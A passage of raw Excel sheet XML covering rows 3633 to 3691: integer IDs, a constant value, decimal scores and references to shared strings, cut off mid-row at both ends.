        <v>4291</v>
      </c>
      <c r="D3633">
        <v>2</v>
      </c>
      <c r="E3633">
        <v>0.87699997425079346</v>
      </c>
      <c r="F3633" t="s">
        <v>5592</v>
      </c>
      <c r="G3633" t="s">
        <v>7184</v>
      </c>
      <c r="H3633" t="s">
        <v>7185</v>
      </c>
    </row>
    <row r="3634" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3634" s="1">
        <v>3632</v>
      </c>
      <c r="B3634">
        <v>5234</v>
      </c>
      <c r="C3634">
        <v>5234</v>
      </c>
      <c r="D3634">
        <v>2</v>
      </c>
      <c r="E3634">
        <v>0.86879998445510864</v>
      </c>
      <c r="F3634" t="s">
        <v>5592</v>
      </c>
      <c r="G3634" t="s">
        <v>7186</v>
      </c>
      <c r="H3634" t="s">
        <v>7187</v>
      </c>
    </row>
    <row r="3635" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3635" s="1">
        <v>3633</v>
      </c>
      <c r="B3635">
        <v>4294</v>
      </c>
      <c r="C3635">
        <v>4294</v>
      </c>
      <c r="D3635">
        <v>2</v>
      </c>
      <c r="E3635">
        <v>0.56690001487731934</v>
      </c>
      <c r="F3635" t="s">
        <v>5592</v>
      </c>
      <c r="G3635" t="s">
        <v>7188</v>
      </c>
      <c r="H3635" t="s">
        <v>7189</v>
      </c>
    </row>
    <row r="3636" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3636" s="1">
        <v>3634</v>
      </c>
      <c r="B3636">
        <v>4299</v>
      </c>
      <c r="C3636">
        <v>4299</v>
      </c>
      <c r="D3636">
        <v>2</v>
      </c>
      <c r="E3636">
        <v>0.92799997329711914</v>
      </c>
      <c r="F3636" t="s">
        <v>5592</v>
      </c>
      <c r="G3636" t="s">
        <v>7190</v>
      </c>
      <c r="H3636" t="s">
        <v>7191</v>
      </c>
    </row>
    <row r="3637" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3637" s="1">
        <v>3635</v>
      </c>
      <c r="B3637">
        <v>6104</v>
      </c>
      <c r="C3637">
        <v>6104</v>
      </c>
      <c r="D3637">
        <v>2</v>
      </c>
      <c r="E3637">
        <v>0.78789997100830078</v>
      </c>
      <c r="F3637" t="s">
        <v>5592</v>
      </c>
      <c r="G3637" t="s">
        <v>7192</v>
      </c>
      <c r="H3637" t="s">
        <v>7193</v>
      </c>
    </row>
    <row r="3638" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3638" s="1">
        <v>3636</v>
      </c>
      <c r="B3638">
        <v>6103</v>
      </c>
      <c r="C3638">
        <v>6103</v>
      </c>
      <c r="D3638">
        <v>2</v>
      </c>
      <c r="E3638">
        <v>0.99659997224807739</v>
      </c>
      <c r="F3638" t="s">
        <v>5592</v>
      </c>
      <c r="G3638" t="s">
        <v>7194</v>
      </c>
      <c r="H3638" t="s">
        <v>7195</v>
      </c>
    </row>
    <row r="3639" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3639" s="1">
        <v>3637</v>
      </c>
      <c r="B3639">
        <v>5233</v>
      </c>
      <c r="C3639">
        <v>5233</v>
      </c>
      <c r="D3639">
        <v>2</v>
      </c>
      <c r="E3639">
        <v>0.63380002975463867</v>
      </c>
      <c r="F3639" t="s">
        <v>5592</v>
      </c>
      <c r="G3639" t="s">
        <v>7196</v>
      </c>
      <c r="H3639" t="s">
        <v>7197</v>
      </c>
    </row>
    <row r="3640" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3640" s="1">
        <v>3638</v>
      </c>
      <c r="B3640">
        <v>5235</v>
      </c>
      <c r="C3640">
        <v>5235</v>
      </c>
      <c r="D3640">
        <v>2</v>
      </c>
      <c r="E3640">
        <v>0.99720001220703125</v>
      </c>
      <c r="F3640" t="s">
        <v>5592</v>
      </c>
      <c r="G3640" t="s">
        <v>7198</v>
      </c>
      <c r="H3640" t="s">
        <v>7199</v>
      </c>
    </row>
    <row r="3641" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3641" s="1">
        <v>3639</v>
      </c>
      <c r="B3641">
        <v>5231</v>
      </c>
      <c r="C3641">
        <v>5231</v>
      </c>
      <c r="D3641">
        <v>2</v>
      </c>
      <c r="E3641">
        <v>0.86009997129440308</v>
      </c>
      <c r="F3641" t="s">
        <v>5592</v>
      </c>
      <c r="G3641" t="s">
        <v>7200</v>
      </c>
      <c r="H3641" t="s">
        <v>7201</v>
      </c>
    </row>
    <row r="3642" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3642" s="1">
        <v>3640</v>
      </c>
      <c r="B3642">
        <v>6118</v>
      </c>
      <c r="C3642">
        <v>6118</v>
      </c>
      <c r="D3642">
        <v>2</v>
      </c>
      <c r="E3642">
        <v>0.70219999551773071</v>
      </c>
      <c r="F3642" t="s">
        <v>5592</v>
      </c>
      <c r="G3642" t="s">
        <v>7202</v>
      </c>
      <c r="H3642" t="s">
        <v>7203</v>
      </c>
    </row>
    <row r="3643" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3643" s="1">
        <v>3641</v>
      </c>
      <c r="B3643">
        <v>5242</v>
      </c>
      <c r="C3643">
        <v>5242</v>
      </c>
      <c r="D3643">
        <v>2</v>
      </c>
      <c r="E3643">
        <v>0.5033000111579895</v>
      </c>
      <c r="F3643" t="s">
        <v>5592</v>
      </c>
      <c r="G3643" t="s">
        <v>7204</v>
      </c>
      <c r="H3643" t="s">
        <v>7205</v>
      </c>
    </row>
    <row r="3644" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3644" s="1">
        <v>3642</v>
      </c>
      <c r="B3644">
        <v>4243</v>
      </c>
      <c r="C3644">
        <v>4243</v>
      </c>
      <c r="D3644">
        <v>2</v>
      </c>
      <c r="E3644">
        <v>0.83060002326965332</v>
      </c>
      <c r="F3644" t="s">
        <v>5592</v>
      </c>
      <c r="G3644" t="s">
        <v>7206</v>
      </c>
      <c r="H3644" t="s">
        <v>7207</v>
      </c>
    </row>
    <row r="3645" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3645" s="1">
        <v>3643</v>
      </c>
      <c r="B3645">
        <v>4248</v>
      </c>
      <c r="C3645">
        <v>4248</v>
      </c>
      <c r="D3645">
        <v>2</v>
      </c>
      <c r="E3645">
        <v>0.99790000915527344</v>
      </c>
      <c r="F3645" t="s">
        <v>5592</v>
      </c>
      <c r="G3645" t="s">
        <v>7208</v>
      </c>
      <c r="H3645" t="s">
        <v>7209</v>
      </c>
    </row>
    <row r="3646" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3646" s="1">
        <v>3644</v>
      </c>
      <c r="B3646">
        <v>4249</v>
      </c>
      <c r="C3646">
        <v>4249</v>
      </c>
      <c r="D3646">
        <v>2</v>
      </c>
      <c r="E3646">
        <v>0.55580002069473267</v>
      </c>
      <c r="F3646" t="s">
        <v>5592</v>
      </c>
      <c r="G3646" t="s">
        <v>7210</v>
      </c>
      <c r="H3646" t="s">
        <v>7211</v>
      </c>
    </row>
    <row r="3647" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3647" s="1">
        <v>3645</v>
      </c>
      <c r="B3647">
        <v>5253</v>
      </c>
      <c r="C3647">
        <v>5253</v>
      </c>
      <c r="D3647">
        <v>2</v>
      </c>
      <c r="E3647">
        <v>0.96729999780654907</v>
      </c>
      <c r="F3647" t="s">
        <v>5592</v>
      </c>
      <c r="G3647" t="s">
        <v>7212</v>
      </c>
      <c r="H3647" t="s">
        <v>7213</v>
      </c>
    </row>
    <row r="3648" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3648" s="1">
        <v>3646</v>
      </c>
      <c r="B3648">
        <v>4250</v>
      </c>
      <c r="C3648">
        <v>4250</v>
      </c>
      <c r="D3648">
        <v>2</v>
      </c>
      <c r="E3648">
        <v>0.82940000295639038</v>
      </c>
      <c r="F3648" t="s">
        <v>5592</v>
      </c>
      <c r="G3648" t="s">
        <v>7214</v>
      </c>
      <c r="H3648" t="s">
        <v>7215</v>
      </c>
    </row>
    <row r="3649" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3649" s="1">
        <v>3647</v>
      </c>
      <c r="B3649">
        <v>6135</v>
      </c>
      <c r="C3649">
        <v>6135</v>
      </c>
      <c r="D3649">
        <v>2</v>
      </c>
      <c r="E3649">
        <v>0.73940002918243408</v>
      </c>
      <c r="F3649" t="s">
        <v>5592</v>
      </c>
      <c r="G3649" t="s">
        <v>7216</v>
      </c>
      <c r="H3649" t="s">
        <v>7217</v>
      </c>
    </row>
    <row r="3650" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3650" s="1">
        <v>3648</v>
      </c>
      <c r="B3650">
        <v>6131</v>
      </c>
      <c r="C3650">
        <v>6131</v>
      </c>
      <c r="D3650">
        <v>2</v>
      </c>
      <c r="E3650">
        <v>0.50770002603530884</v>
      </c>
      <c r="F3650" t="s">
        <v>5592</v>
      </c>
      <c r="G3650" t="s">
        <v>7218</v>
      </c>
      <c r="H3650" t="s">
        <v>7219</v>
      </c>
    </row>
    <row r="3651" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3651" s="1">
        <v>3649</v>
      </c>
      <c r="B3651">
        <v>6121</v>
      </c>
      <c r="C3651">
        <v>6121</v>
      </c>
      <c r="D3651">
        <v>2</v>
      </c>
      <c r="E3651">
        <v>0.99580001831054688</v>
      </c>
      <c r="F3651" t="s">
        <v>5592</v>
      </c>
      <c r="G3651" t="s">
        <v>7220</v>
      </c>
      <c r="H3651" t="s">
        <v>7221</v>
      </c>
    </row>
    <row r="3652" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3652" s="1">
        <v>3650</v>
      </c>
      <c r="B3652">
        <v>6129</v>
      </c>
      <c r="C3652">
        <v>6129</v>
      </c>
      <c r="D3652">
        <v>2</v>
      </c>
      <c r="E3652">
        <v>0.72170001268386841</v>
      </c>
      <c r="F3652" t="s">
        <v>5592</v>
      </c>
      <c r="G3652" t="s">
        <v>7222</v>
      </c>
      <c r="H3652" t="s">
        <v>7223</v>
      </c>
    </row>
    <row r="3653" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3653" s="1">
        <v>3651</v>
      </c>
      <c r="B3653">
        <v>6128</v>
      </c>
      <c r="C3653">
        <v>6128</v>
      </c>
      <c r="D3653">
        <v>2</v>
      </c>
      <c r="E3653">
        <v>0.78799998760223389</v>
      </c>
      <c r="F3653" t="s">
        <v>5592</v>
      </c>
      <c r="G3653" t="s">
        <v>7224</v>
      </c>
      <c r="H3653" t="s">
        <v>7225</v>
      </c>
    </row>
    <row r="3654" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3654" s="1">
        <v>3652</v>
      </c>
      <c r="B3654">
        <v>6127</v>
      </c>
      <c r="C3654">
        <v>6127</v>
      </c>
      <c r="D3654">
        <v>2</v>
      </c>
      <c r="E3654">
        <v>0.91659998893737793</v>
      </c>
      <c r="F3654" t="s">
        <v>5592</v>
      </c>
      <c r="G3654" t="s">
        <v>7226</v>
      </c>
      <c r="H3654" t="s">
        <v>7227</v>
      </c>
    </row>
    <row r="3655" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3655" s="1">
        <v>3653</v>
      </c>
      <c r="B3655">
        <v>5245</v>
      </c>
      <c r="C3655">
        <v>5245</v>
      </c>
      <c r="D3655">
        <v>2</v>
      </c>
      <c r="E3655">
        <v>0.99849998950958252</v>
      </c>
      <c r="F3655" t="s">
        <v>5592</v>
      </c>
      <c r="G3655" t="s">
        <v>7228</v>
      </c>
      <c r="H3655" t="s">
        <v>7229</v>
      </c>
    </row>
    <row r="3656" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3656" s="1">
        <v>3654</v>
      </c>
      <c r="B3656">
        <v>5244</v>
      </c>
      <c r="C3656">
        <v>5244</v>
      </c>
      <c r="D3656">
        <v>2</v>
      </c>
      <c r="E3656">
        <v>0.75749999284744263</v>
      </c>
      <c r="F3656" t="s">
        <v>5592</v>
      </c>
      <c r="G3656" t="s">
        <v>7230</v>
      </c>
      <c r="H3656" t="s">
        <v>7231</v>
      </c>
    </row>
    <row r="3657" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3657" s="1">
        <v>3655</v>
      </c>
      <c r="B3657">
        <v>6125</v>
      </c>
      <c r="C3657">
        <v>6125</v>
      </c>
      <c r="D3657">
        <v>2</v>
      </c>
      <c r="E3657">
        <v>0.50999999046325684</v>
      </c>
      <c r="F3657" t="s">
        <v>5592</v>
      </c>
      <c r="G3657" t="s">
        <v>7232</v>
      </c>
      <c r="H3657" t="s">
        <v>7233</v>
      </c>
    </row>
    <row r="3658" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3658" s="1">
        <v>3656</v>
      </c>
      <c r="B3658">
        <v>4265</v>
      </c>
      <c r="C3658">
        <v>4265</v>
      </c>
      <c r="D3658">
        <v>2</v>
      </c>
      <c r="E3658">
        <v>0.46450001001358032</v>
      </c>
      <c r="F3658" t="s">
        <v>5592</v>
      </c>
      <c r="G3658" t="s">
        <v>7234</v>
      </c>
      <c r="H3658" t="s">
        <v>7235</v>
      </c>
    </row>
    <row r="3659" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3659" s="1">
        <v>3657</v>
      </c>
      <c r="B3659">
        <v>5243</v>
      </c>
      <c r="C3659">
        <v>5243</v>
      </c>
      <c r="D3659">
        <v>2</v>
      </c>
      <c r="E3659">
        <v>0.69190001487731934</v>
      </c>
      <c r="F3659" t="s">
        <v>5592</v>
      </c>
      <c r="G3659" t="s">
        <v>7236</v>
      </c>
      <c r="H3659" t="s">
        <v>7237</v>
      </c>
    </row>
    <row r="3660" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3660" s="1">
        <v>3658</v>
      </c>
      <c r="B3660">
        <v>4259</v>
      </c>
      <c r="C3660">
        <v>4259</v>
      </c>
      <c r="D3660">
        <v>2</v>
      </c>
      <c r="E3660">
        <v>0.51969999074935913</v>
      </c>
      <c r="F3660" t="s">
        <v>5592</v>
      </c>
      <c r="G3660" t="s">
        <v>7238</v>
      </c>
      <c r="H3660" t="s">
        <v>7239</v>
      </c>
    </row>
    <row r="3661" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3661" s="1">
        <v>3659</v>
      </c>
      <c r="B3661">
        <v>4615</v>
      </c>
      <c r="C3661">
        <v>4615</v>
      </c>
      <c r="D3661">
        <v>2</v>
      </c>
      <c r="E3661">
        <v>0.94510000944137573</v>
      </c>
      <c r="F3661" t="s">
        <v>5592</v>
      </c>
      <c r="G3661" t="s">
        <v>7240</v>
      </c>
      <c r="H3661" t="s">
        <v>7241</v>
      </c>
    </row>
    <row r="3662" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3662" s="1">
        <v>3660</v>
      </c>
      <c r="B3662">
        <v>2787</v>
      </c>
      <c r="C3662">
        <v>2787</v>
      </c>
      <c r="D3662">
        <v>2</v>
      </c>
      <c r="E3662">
        <v>0.69470000267028809</v>
      </c>
      <c r="F3662" t="s">
        <v>5592</v>
      </c>
      <c r="G3662" t="s">
        <v>7242</v>
      </c>
      <c r="H3662" t="s">
        <v>7243</v>
      </c>
    </row>
    <row r="3663" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3663" s="1">
        <v>3661</v>
      </c>
      <c r="B3663">
        <v>3654</v>
      </c>
      <c r="C3663">
        <v>3654</v>
      </c>
      <c r="D3663">
        <v>2</v>
      </c>
      <c r="E3663">
        <v>0.99250000715255737</v>
      </c>
      <c r="F3663" t="s">
        <v>5592</v>
      </c>
      <c r="G3663" t="s">
        <v>7244</v>
      </c>
      <c r="H3663" t="s">
        <v>7245</v>
      </c>
    </row>
    <row r="3664" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3664" s="1">
        <v>3662</v>
      </c>
      <c r="B3664">
        <v>1322</v>
      </c>
      <c r="C3664">
        <v>1322</v>
      </c>
      <c r="D3664">
        <v>2</v>
      </c>
      <c r="E3664">
        <v>0.43489998579025269</v>
      </c>
      <c r="F3664" t="s">
        <v>5592</v>
      </c>
      <c r="G3664" t="s">
        <v>7246</v>
      </c>
      <c r="H3664" t="s">
        <v>7247</v>
      </c>
    </row>
    <row r="3665" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3665" s="1">
        <v>3663</v>
      </c>
      <c r="B3665">
        <v>1324</v>
      </c>
      <c r="C3665">
        <v>1324</v>
      </c>
      <c r="D3665">
        <v>2</v>
      </c>
      <c r="E3665">
        <v>0.77029997110366821</v>
      </c>
      <c r="F3665" t="s">
        <v>5592</v>
      </c>
      <c r="G3665" t="s">
        <v>7248</v>
      </c>
      <c r="H3665" t="s">
        <v>7249</v>
      </c>
    </row>
    <row r="3666" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3666" s="1">
        <v>3664</v>
      </c>
      <c r="B3666">
        <v>1325</v>
      </c>
      <c r="C3666">
        <v>1325</v>
      </c>
      <c r="D3666">
        <v>2</v>
      </c>
      <c r="E3666">
        <v>0.99860000610351563</v>
      </c>
      <c r="F3666" t="s">
        <v>5592</v>
      </c>
      <c r="G3666" t="s">
        <v>7250</v>
      </c>
      <c r="H3666" t="s">
        <v>7251</v>
      </c>
    </row>
    <row r="3667" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3667" s="1">
        <v>3665</v>
      </c>
      <c r="B3667">
        <v>1326</v>
      </c>
      <c r="C3667">
        <v>1326</v>
      </c>
      <c r="D3667">
        <v>2</v>
      </c>
      <c r="E3667">
        <v>0.9100000262260437</v>
      </c>
      <c r="F3667" t="s">
        <v>5592</v>
      </c>
      <c r="G3667" t="s">
        <v>7252</v>
      </c>
      <c r="H3667" t="s">
        <v>7253</v>
      </c>
    </row>
    <row r="3668" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3668" s="1">
        <v>3666</v>
      </c>
      <c r="B3668">
        <v>1327</v>
      </c>
      <c r="C3668">
        <v>1327</v>
      </c>
      <c r="D3668">
        <v>2</v>
      </c>
      <c r="E3668">
        <v>0.45219999551773071</v>
      </c>
      <c r="F3668" t="s">
        <v>5592</v>
      </c>
      <c r="G3668" t="s">
        <v>7254</v>
      </c>
      <c r="H3668" t="s">
        <v>7255</v>
      </c>
    </row>
    <row r="3669" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3669" s="1">
        <v>3667</v>
      </c>
      <c r="B3669">
        <v>1328</v>
      </c>
      <c r="C3669">
        <v>1328</v>
      </c>
      <c r="D3669">
        <v>2</v>
      </c>
      <c r="E3669">
        <v>0.56120002269744873</v>
      </c>
      <c r="F3669" t="s">
        <v>5592</v>
      </c>
      <c r="G3669" t="s">
        <v>7256</v>
      </c>
      <c r="H3669" t="s">
        <v>7257</v>
      </c>
    </row>
    <row r="3670" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3670" s="1">
        <v>3668</v>
      </c>
      <c r="B3670">
        <v>7312</v>
      </c>
      <c r="C3670">
        <v>7312</v>
      </c>
      <c r="D3670">
        <v>2</v>
      </c>
      <c r="E3670">
        <v>0.99720001220703125</v>
      </c>
      <c r="F3670" t="s">
        <v>5592</v>
      </c>
      <c r="G3670" t="s">
        <v>7258</v>
      </c>
      <c r="H3670" t="s">
        <v>7259</v>
      </c>
    </row>
    <row r="3671" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3671" s="1">
        <v>3669</v>
      </c>
      <c r="B3671">
        <v>1335</v>
      </c>
      <c r="C3671">
        <v>1335</v>
      </c>
      <c r="D3671">
        <v>2</v>
      </c>
      <c r="E3671">
        <v>0.50770002603530884</v>
      </c>
      <c r="F3671" t="s">
        <v>5592</v>
      </c>
      <c r="G3671" t="s">
        <v>7260</v>
      </c>
      <c r="H3671" t="s">
        <v>7261</v>
      </c>
    </row>
    <row r="3672" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3672" s="1">
        <v>3670</v>
      </c>
      <c r="B3672">
        <v>1336</v>
      </c>
      <c r="C3672">
        <v>1336</v>
      </c>
      <c r="D3672">
        <v>2</v>
      </c>
      <c r="E3672">
        <v>0.46619999408721918</v>
      </c>
      <c r="F3672" t="s">
        <v>5592</v>
      </c>
      <c r="G3672" t="s">
        <v>7262</v>
      </c>
      <c r="H3672" t="s">
        <v>7263</v>
      </c>
    </row>
    <row r="3673" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3673" s="1">
        <v>3671</v>
      </c>
      <c r="B3673">
        <v>7305</v>
      </c>
      <c r="C3673">
        <v>7305</v>
      </c>
      <c r="D3673">
        <v>2</v>
      </c>
      <c r="E3673">
        <v>0.70359998941421509</v>
      </c>
      <c r="F3673" t="s">
        <v>5592</v>
      </c>
      <c r="G3673" t="s">
        <v>7264</v>
      </c>
      <c r="H3673" t="s">
        <v>7265</v>
      </c>
    </row>
    <row r="3674" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3674" s="1">
        <v>3672</v>
      </c>
      <c r="B3674">
        <v>1342</v>
      </c>
      <c r="C3674">
        <v>1342</v>
      </c>
      <c r="D3674">
        <v>2</v>
      </c>
      <c r="E3674">
        <v>0.49750000238418579</v>
      </c>
      <c r="F3674" t="s">
        <v>5592</v>
      </c>
      <c r="G3674" t="s">
        <v>7266</v>
      </c>
      <c r="H3674" t="s">
        <v>7267</v>
      </c>
    </row>
    <row r="3675" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3675" s="1">
        <v>3673</v>
      </c>
      <c r="B3675">
        <v>1345</v>
      </c>
      <c r="C3675">
        <v>1345</v>
      </c>
      <c r="D3675">
        <v>2</v>
      </c>
      <c r="E3675">
        <v>0.46759998798370361</v>
      </c>
      <c r="F3675" t="s">
        <v>5592</v>
      </c>
      <c r="G3675" t="s">
        <v>7268</v>
      </c>
      <c r="H3675" t="s">
        <v>7269</v>
      </c>
    </row>
    <row r="3676" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3676" s="1">
        <v>3674</v>
      </c>
      <c r="B3676">
        <v>1346</v>
      </c>
      <c r="C3676">
        <v>1346</v>
      </c>
      <c r="D3676">
        <v>2</v>
      </c>
      <c r="E3676">
        <v>0.631600022315979</v>
      </c>
      <c r="F3676" t="s">
        <v>5592</v>
      </c>
      <c r="G3676" t="s">
        <v>7270</v>
      </c>
      <c r="H3676" t="s">
        <v>7271</v>
      </c>
    </row>
    <row r="3677" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3677" s="1">
        <v>3675</v>
      </c>
      <c r="B3677">
        <v>1348</v>
      </c>
      <c r="C3677">
        <v>1348</v>
      </c>
      <c r="D3677">
        <v>2</v>
      </c>
      <c r="E3677">
        <v>0.69029998779296875</v>
      </c>
      <c r="F3677" t="s">
        <v>5592</v>
      </c>
      <c r="G3677" t="s">
        <v>7272</v>
      </c>
      <c r="H3677" t="s">
        <v>7273</v>
      </c>
    </row>
    <row r="3678" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3678" s="1">
        <v>3676</v>
      </c>
      <c r="B3678">
        <v>7302</v>
      </c>
      <c r="C3678">
        <v>7302</v>
      </c>
      <c r="D3678">
        <v>2</v>
      </c>
      <c r="E3678">
        <v>0.97820001840591431</v>
      </c>
      <c r="F3678" t="s">
        <v>5592</v>
      </c>
      <c r="G3678" t="s">
        <v>7274</v>
      </c>
      <c r="H3678" t="s">
        <v>7275</v>
      </c>
    </row>
    <row r="3679" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3679" s="1">
        <v>3677</v>
      </c>
      <c r="B3679">
        <v>1352</v>
      </c>
      <c r="C3679">
        <v>1352</v>
      </c>
      <c r="D3679">
        <v>2</v>
      </c>
      <c r="E3679">
        <v>0.98919999599456787</v>
      </c>
      <c r="F3679" t="s">
        <v>5592</v>
      </c>
      <c r="G3679" t="s">
        <v>7276</v>
      </c>
      <c r="H3679" t="s">
        <v>7277</v>
      </c>
    </row>
    <row r="3680" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3680" s="1">
        <v>3678</v>
      </c>
      <c r="B3680">
        <v>1353</v>
      </c>
      <c r="C3680">
        <v>1353</v>
      </c>
      <c r="D3680">
        <v>2</v>
      </c>
      <c r="E3680">
        <v>0.99159997701644897</v>
      </c>
      <c r="F3680" t="s">
        <v>5592</v>
      </c>
      <c r="G3680" t="s">
        <v>7278</v>
      </c>
      <c r="H3680" t="s">
        <v>7279</v>
      </c>
    </row>
    <row r="3681" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3681" s="1">
        <v>3679</v>
      </c>
      <c r="B3681">
        <v>1354</v>
      </c>
      <c r="C3681">
        <v>1354</v>
      </c>
      <c r="D3681">
        <v>2</v>
      </c>
      <c r="E3681">
        <v>0.90490001440048218</v>
      </c>
      <c r="F3681" t="s">
        <v>5592</v>
      </c>
      <c r="G3681" t="s">
        <v>7280</v>
      </c>
      <c r="H3681" t="s">
        <v>7281</v>
      </c>
    </row>
    <row r="3682" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3682" s="1">
        <v>3680</v>
      </c>
      <c r="B3682">
        <v>1355</v>
      </c>
      <c r="C3682">
        <v>1355</v>
      </c>
      <c r="D3682">
        <v>2</v>
      </c>
      <c r="E3682">
        <v>0.6370999813079834</v>
      </c>
      <c r="F3682" t="s">
        <v>5592</v>
      </c>
      <c r="G3682" t="s">
        <v>7282</v>
      </c>
      <c r="H3682" t="s">
        <v>7283</v>
      </c>
    </row>
    <row r="3683" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3683" s="1">
        <v>3681</v>
      </c>
      <c r="B3683">
        <v>7298</v>
      </c>
      <c r="C3683">
        <v>7298</v>
      </c>
      <c r="D3683">
        <v>2</v>
      </c>
      <c r="E3683">
        <v>0.64789998531341553</v>
      </c>
      <c r="F3683" t="s">
        <v>5592</v>
      </c>
      <c r="G3683" t="s">
        <v>7284</v>
      </c>
      <c r="H3683" t="s">
        <v>7285</v>
      </c>
    </row>
    <row r="3684" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3684" s="1">
        <v>3682</v>
      </c>
      <c r="B3684">
        <v>7297</v>
      </c>
      <c r="C3684">
        <v>7297</v>
      </c>
      <c r="D3684">
        <v>2</v>
      </c>
      <c r="E3684">
        <v>0.98229998350143433</v>
      </c>
      <c r="F3684" t="s">
        <v>5592</v>
      </c>
      <c r="G3684" t="s">
        <v>7286</v>
      </c>
      <c r="H3684" t="s">
        <v>7287</v>
      </c>
    </row>
    <row r="3685" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3685" s="1">
        <v>3683</v>
      </c>
      <c r="B3685">
        <v>1315</v>
      </c>
      <c r="C3685">
        <v>1315</v>
      </c>
      <c r="D3685">
        <v>2</v>
      </c>
      <c r="E3685">
        <v>0.92979997396469116</v>
      </c>
      <c r="F3685" t="s">
        <v>5592</v>
      </c>
      <c r="G3685" t="s">
        <v>7288</v>
      </c>
      <c r="H3685" t="s">
        <v>7289</v>
      </c>
    </row>
    <row r="3686" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3686" s="1">
        <v>3684</v>
      </c>
      <c r="B3686">
        <v>1314</v>
      </c>
      <c r="C3686">
        <v>1314</v>
      </c>
      <c r="D3686">
        <v>2</v>
      </c>
      <c r="E3686">
        <v>0.52880001068115234</v>
      </c>
      <c r="F3686" t="s">
        <v>5592</v>
      </c>
      <c r="G3686" t="s">
        <v>7290</v>
      </c>
      <c r="H3686" t="s">
        <v>7291</v>
      </c>
    </row>
    <row r="3687" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3687" s="1">
        <v>3685</v>
      </c>
      <c r="B3687">
        <v>1305</v>
      </c>
      <c r="C3687">
        <v>1305</v>
      </c>
      <c r="D3687">
        <v>2</v>
      </c>
      <c r="E3687">
        <v>0.87059998512268066</v>
      </c>
      <c r="F3687" t="s">
        <v>5592</v>
      </c>
      <c r="G3687" t="s">
        <v>7292</v>
      </c>
      <c r="H3687" t="s">
        <v>7293</v>
      </c>
    </row>
    <row r="3688" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3688" s="1">
        <v>3686</v>
      </c>
      <c r="B3688">
        <v>1304</v>
      </c>
      <c r="C3688">
        <v>1304</v>
      </c>
      <c r="D3688">
        <v>2</v>
      </c>
      <c r="E3688">
        <v>0.99210000038146973</v>
      </c>
      <c r="F3688" t="s">
        <v>5592</v>
      </c>
      <c r="G3688" t="s">
        <v>7294</v>
      </c>
      <c r="H3688" t="s">
        <v>7295</v>
      </c>
    </row>
    <row r="3689" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3689" s="1">
        <v>3687</v>
      </c>
      <c r="B3689">
        <v>1249</v>
      </c>
      <c r="C3689">
        <v>1249</v>
      </c>
      <c r="D3689">
        <v>2</v>
      </c>
      <c r="E3689">
        <v>0.78420001268386841</v>
      </c>
      <c r="F3689" t="s">
        <v>5592</v>
      </c>
      <c r="G3689" t="s">
        <v>7296</v>
      </c>
      <c r="H3689" t="s">
        <v>7297</v>
      </c>
    </row>
    <row r="3690" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3690" s="1">
        <v>3688</v>
      </c>
      <c r="B3690">
        <v>1252</v>
      </c>
      <c r="C3690">
        <v>1252</v>
      </c>
      <c r="D3690">
        <v>2</v>
      </c>
      <c r="E3690">
        <v>0.52569997310638428</v>
      </c>
      <c r="F3690" t="s">
        <v>5592</v>
      </c>
      <c r="G3690" t="s">
        <v>7298</v>
      </c>
      <c r="H3690" t="s">
        <v>7299</v>
      </c>
    </row>
    <row r="3691" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3691" s="1">
        <v>3689</v>
      </c>
      <c r="B3691">
        <v>1254</v>
      </c>
      <c r="C3691">
        <v>1254</v>
      </c>
      <c r="D3691">
        <v>2</v>
      </c>
      <c r="E3691">
        <v>0.50639998912811279</v>
      </c>
      <c r="F3691" t="s">
        <v>5592</v>
